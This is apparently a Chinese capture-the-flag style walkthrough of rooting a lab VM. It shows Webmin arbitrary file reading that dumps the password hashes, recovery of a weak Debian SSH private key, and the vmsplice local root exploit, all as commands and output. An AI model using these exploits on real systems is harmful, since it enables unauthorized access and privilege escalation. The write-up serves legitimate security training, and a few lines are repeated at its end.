kali ip:192.168.2.133
目标 ip:192.168.2.139
1.信息收集
- nmap -sV -A 192.168.2.139
- Host is up (0.0062s latency).
- Not shown: 995 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
- 80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
- 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: MSHOME)
- 445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: MSHOME)
- 10000/tcp open http MiniServ 0.01 (Webmin httpd)
2.漏洞利用
- webmin任意文件读取
- 使用msf的admin/webmin/file_disclosure模块
- 发现四名用户
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bashvmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::- 爆破密码太慢,看是否有ssh公钥。查看第一个用户,发现公钥
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw== vmware@ubuntuvm
- 利用工具查找私钥
# 下载工具并解压
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
# 查找公钥对应的公钥文件
cd rsa/2048
grep -lr "AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw=="
# 找到公钥文件
d8629ce6dc8f2492e1454c13f46adb26-4566.pub
# 找私钥文件
去掉公钥文件的.pub对应的文件就是私钥文件
- 利用私钥文件无密码登录,获取shell
ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.2.139 -oHostKeyAlgorithms=ssh-rsa -oPubkeyAcceptedKeyTypes=ssh-rsa
vmware@ubuntuvm:~$
- 利用内核进行提权
- 查看内核版本:uname -a
Linux ubuntuvm 2.6.22-14-server
- 查看内核漏洞:searchsploit “Linux Kernel 2.6.2” |grep “Local Privilege”
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2) linux/local/5092.c
# 下载
searchsploit -m linux/local/5092.c .
- 本地提权
- 查看作者的注释没发现特别说明,直接用python共享至目标,编译并运行
gcc 5092.c -o poc
./poc
# 直接root
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7daf000 .. 0xb7de1000
[+] root
root@ubuntuvm:~#
- 查看作者的注释没发现特别说明,直接用python共享至目标,编译并运行
- 查看内核版本:uname -a